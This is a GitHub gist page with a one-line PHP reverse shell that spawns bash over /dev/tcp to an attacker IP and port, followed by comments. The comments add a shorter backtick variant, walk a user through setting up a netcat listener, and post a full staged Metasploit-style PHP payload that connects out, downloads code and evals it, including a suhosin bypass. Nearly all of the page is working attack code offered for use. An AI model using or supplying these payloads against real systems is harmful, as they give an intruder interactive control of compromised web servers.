-
-
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
it was bash not a php
it was bash not a php
@Cvar1984
It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
it was bash not a php
@Cvar1984It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
Yea i know it spawn bash using php system call
Then this is the tiniest
<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>
it was bash not a php
@Cvar1984It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.
Yea i know it spawn bash using php system call
Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.
eu não sei qual ip usar, alguém me ajuda por gentileza !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !
- You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
- You have to open a listening port in your attacking machine, (nc -nvlp 1234)
- You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)
And thats all.
@SergioChicoITCL muito obrigado campeão ! você é demais !
This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();